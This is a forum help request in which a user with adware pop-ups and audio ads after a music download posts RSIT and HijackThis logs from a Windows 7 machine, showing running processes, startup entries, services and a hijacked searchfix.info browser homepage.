Who will take a look at my log


I recently downloaded music, which resulted in 6 viruses; I was able to eliminate or remove all of them.

But now every few minutes I hear a radio spot, an advertisement for something, and sometimes a page also pops up out of nowhere.

So I am almost certain that something is being overlooked by the virus scanners alone; I have already scanned with AVG, ESET and Malwarebytes.

Logfile of random's system information tool 1.10 (written by random/random)

Run by Jordan at 2014-11-28 19:06:21

Microsoft Windows 7 Ultimate Service Pack 1

System drive C: has 354 GB (76%) free of 465 GB

Total RAM: 5581 MB (37% free)

Logfile of Trend Micro HijackThis v2.0.4

Scan saved at 19:06:38, on 28-11-2014

Platform: Windows 7 SP1 (WinNT 6.00.3505)

MSIE: Internet Explorer v11.0 (11.00.9600.17420)

Boot mode: Normal

Running processes:

C:\Program Files (x86)\Auslogics\BoostSpeed\BoostSpeed.exe

C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe

C:\Program Files (x86)\AVG\AVG2015\avgui.exe

C:\Windows\SysWOW64\ctfmon.exe

C:\Program Files (x86)\Emsisoft Anti-Malware\a2wizard.exe

C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerApp.exe

C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScanner.exe

C:\Program Files (x86)\Mozilla Firefox\firefox.exe

C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe

C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe

C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe

C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files\trend micro\Jordan.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = Google

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = msn

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = Bing

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = Bing

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

F2 - REG:system.ini: UserInit=userinit.exe,

O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll

O2 - BHO: Aanmeldhulp voor Microsoft-account - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O4 - HKLM\..\Run: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

O4 - HKLM\..\Run: [emsisoft anti-malware] "C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe" /d=60

O4 - HKCU\..\Run: [smAudio] C:\Program Files\Conexant\SmartAudio\SmAudio.exe -c

O4 - HKCU\..\Run: [WinPatrol] C:\Program Files (x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot

O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR

O4 - HKUS\S-1-5-19\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User '?')

O4 - HKUS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User '?')

O4 - HKUS\S-1-5-20\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')

O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')

O4 - HKUS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User '?')

O4 - HKUS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User '?')

O4 - HKUS\S-1-5-21-4250213819-786104705-630478919-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [smAudio] C:\Program Files\Conexant\SmartAudio\SmAudio.exe -c (User '?')

O4 - S-1-5-21-4250213819-786104705-630478919-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 Startup: Dropbox.lnk = Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe (User '?')

O4 - Startup: Dropbox.lnk = Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe

O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200

O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000

O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll

O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll

O9 - Extra button: Verzenden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll

O9 - Extra 'Tools' menuitem: Verz&enden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll

O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\Office12\REFIEBAR.DLL

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics

O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab

O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll

O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll

O23 - Service: Emsisoft Protection Service (a2AntiMalware) - Emsisoft GmbH - C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe

O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)

O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)

O23 - Service: AtherosSvc - Qualcomm Atheros Commnucations - C:\Program Files (x86)\Bluetooth Suite\adminservice.exe

O23 - Service: AVGIDSAgent - AVG Technologies CZ, s.r.o. - C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe

O23 - Service: AVG WatchDog (avgwd) - AVG Technologies CZ, s.r.o. - C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe

O23 - Service: Cron Service for Prey (CronService) - Fork Ltd. - C:\Prey\platform\windows\cronsvc.exe

O23 - Service: @C:\Windows\system32\CxAudMsg64.exe,-100 (CxAudMsg) - Unknown owner - C:\Windows\system32\CxAudMsg64.exe (file missing)

O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)

O23 - Service: Google Update-service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Update-service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe

O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)

O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)

O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)

O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: Secunia PSI Agent - Secunia - C:\Program Files (x86)\Secunia\PSI\PSIA.exe

O23 - Service: Secunia Update Agent - Secunia - C:\Program Files (x86)\Secunia\PSI\sua.exe

O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)

O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)

O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)

O23 - Service: TeamViewer 8 (TeamViewer8) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe

O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)

O23 - Service: VirtualRouterService (Virtual Router) - Chris Pietschmann (Chris Pietschmann | husband, father, hacker, entrepreneur, futurist, innovator, autodidact) - C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe

O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)

O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)

O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)

O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)

O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--

End of file - 10991 bytes

======Listing Processes======

\SystemRoot\System32\smss.exe

c:\PROGRA~2\AVG\AVG2015\avgrsa.exe /boot

C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe /pipeName=c2feea3f-0200-0000-5ff8-b03f0556f331 /binaryPath="C:\Program Files (x86)\AVG\AVG2015\"

%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16

wininit.exe

%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\system32\atiesrxx.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k GPSvcGroup

atieclxx

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

"taskhost.exe"

"C:\Windows\system32\Dwm.exe"

"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"

C:\Windows\Explorer.EXE

"C:\Program Files (x86)\Bluetooth Suite\adminservice.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe"

"C:\Prey\platform\windows\cronsvc.exe"

C:\Windows\system32\CxAudMsg64.exe

"C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service

C:\Windows\system32\svchost.exe -k imgsvc

"C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgemca.exe"

taskeng.exe {445142E6-89E3-4BE6-A3D3-5EBBBF3EF845}

"C:\Program Files (x86)\Auslogics\BoostSpeed\BoostSpeed.exe" -UseTray

"C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe"

"C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe"

"C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler64.exe"

"C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"

"C:\Program Files\Elantech\ETDCtrl.exe"

"C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe"

WLIDSvcM.exe 2484

"C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe" -expressboot

"C:\Program Files (x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

ctfmon.exe

"C:\Program Files (x86)\Secunia\PSI\sua.exe" --start-service

C:\Windows\system32\SearchIndexer.exe /Embedding

C:\Windows\system32\svchost.exe -k bthsvcs

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

"C:\Program Files\Elantech\ETDCtrlHelper.exe"

"C:\Program Files\Windows Media Player\wmpnetwk.exe"

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\System32\svchost.exe -k LocalServicePeerNet

"C:\Program Files (x86)\Bluetooth Suite\BtTray.exe"

"C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"

C:\Windows\system32\DllHost.exe /Processid:{30D49246-D217-465F-B00B-AC9DDD652EB7}

"C:\Program Files\CCleaner\CCleaner.exe" /MONITOR /uac

"C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe"

"C:\Program Files (x86)\Emsisoft Anti-Malware\a2wizard.exe"

"C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerApp.exe" lng=1033

"C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScanner.exe" "/base-dir=C:\Program Files (x86)\ESET\ESET Online Scanner" /lang=1033 /as

\??\C:\Windows\system32\conhost.exe "1475016711-348333358-10118373621225011641830753606145517866314415369511050940815

"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"

"C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe" --channel=6708.18cb8ca0.1019707608 "C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" -greomni "C:\Program Files (x86)\Mozilla Firefox\omni.ja" -appomni "C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files (x86)\Mozilla Firefox\browser" E7CF176E110C211B 6708 "\\.\pipe\gecko-crash-server-pipe.6708" plugin

"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --proxy-stub-channel=Flash2344.5D79E980.9327 --host-broker-channel=Flash2344.5D79E980.9397 --host-pid=2344 --host-npapi-version=27 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll"

"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --channel=5080.005AF524.895005784 --proxy-stub-channel=Flash2344.5D79E980.9327 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" --host-npapi-version=27 --type=renderer

"C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe"

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.pc-helpforum.be/register.php?a=act&u=51036&i=8beae8ea8b00df6511cd11d20fbb8929a20fdb14

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.pc-helpforum.be/register.php?a=act&u=51036&i=8beae8ea8b00df6511cd11d20fbb8929a20fdb14

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5684 CREDAT:267521 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4516 CREDAT:267521 /prefetch:2

C:\Windows\system32\Macromed\Flash\FlashUtil64_15_0_0_239_ActiveX.exe -Embedding

"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4516 CREDAT:202040 /prefetch:2

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-4250213819-786104705-630478919-100029_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-4250213819-786104705-630478919-100029 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

C:\Windows\system32\wbem\wmiprvse.exe

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe30_ Global\UsGthrCtrlFltPipeMssGthrPipe30 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Users\Jordan\Downloads\RSITx64.exe"

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

C:\Windows\tasks\GoogleUpdateTaskMachineCore.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c

C:\Windows\tasks\GoogleUpdateTaskMachineUA.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-4250213819-786104705-630478919-1000Core.job - C:\Users\Jordan\AppData\Local\Google\Update\GoogleUpdate.exe /c

C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-4250213819-786104705-630478919-1000UA.job - C:\Users\Jordan\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

=========Mozilla firefox=========

ProfilePath - C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default

prefs.js - "browser.search.suggest.enabled" - false

prefs.js - "browser.search.useDBForOrder" - true

prefs.js - "browser.startup.homepage" - "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25"

prefs.js - "keyword.URL" - "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q="

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]

"Description"=Adobe® Flash® Player 15.0.0.239 Plugin

"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer]

"Description"=Adobe Shockwave Player

"Path"=C:\Windows\SysWOW64\Adobe\Director\np32dsw_1210150.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Google.com/GoogleEarthPlugin]

"Description"=Google Earth in your browser

"Path"=C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]

"Description"=Picasa3 plugin

"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]

"Description"=

"Path"=disabled

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]

"Description"=Ag Player Plugin

"Path"=c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205]

"Description"=WLPG Install MIME type

"Path"=C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]

"Description"=Google Update

"Path"=C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]

"Description"=Google Update

"Path"=C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.2]

"Description"=VLC Multimedia Plugin

"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]

"Description"=VLC Multimedia Plugin

"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]

"Description"=Handles PDFs in-place in Firefox

"Path"=C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]

"Description"=Adobe® Flash® Player 15.0.0.239 Plugin

"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]

"Description"=

"Path"=disabled

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]

"Description"=Ag Player Plugin

"Path"=c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll

C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\extensions\

O@bHpatKv.com

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8D10F6C4-0E01-4BD4-8601-11AC1FDF8126}]

CIESpeechBHO Class - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10 64640]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]

Windows Live ID Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17 529664]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]

Groove GFS Browser Helper - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]

Aanmeldhulp voor Microsoft-account - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17 441592]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"ETDCtrl"=C:\Program Files\Elantech\ETDCtrl.exe [2012-10-05 2873744]

"RtsCM"=C:\Windows\RTSCM64.EXE [2013-03-06 144456]

"AmIcoSinglun64"=C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [2013-10-18 366720]

"BtPreLoad"=C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [2012-08-10 64640]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"SmAudio"=C:\Program Files\Conexant\SmartAudio\SmAudio.exe [2013-10-18 2689664]

"WinPatrol"=C:\Program Files (x86)\BillP Studios\WinPatrol\winpatrol.exe [2014-03-22 527936]

"CCleaner Monitoring"=C:\Program Files\CCleaner\CCleaner64.exe [2014-10-23 6501656]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21 959176]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BlueStacks Agent]

C:\Program Files (x86)\BlueStacks\HD-Agent.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]

C:\Users\Jordan\AppData\Local\Google\Update\GoogleUpdate.exe [2014-03-08 116648]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google+ Auto Backup]

C:\Users\Jordan\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe [2014-08-12 3746120]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GrooveMonitor]

C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [2009-02-26 30040]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk]

C:\PROGRA~2\Secunia\PSI\psi_tray.exe [2013-12-06 565464]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Virtual Router Manager.lnk]

C:\Windows\INSTAL~1\{BE905~1\_118D1~1.EXE [2013-12-02 22486]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Jordan^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk]

C:\Users\Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe [2014-11-13 35419192]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]

"AVG_UI"=C:\Program Files (x86)\AVG\AVG2015\avgui.exe [2014-11-09 3653136]

"emsisoft anti-malware"=C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe [2014-10-13 4873248]

C:\Users\Jordan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Dropbox.lnk - C:\Users\Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]

"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]

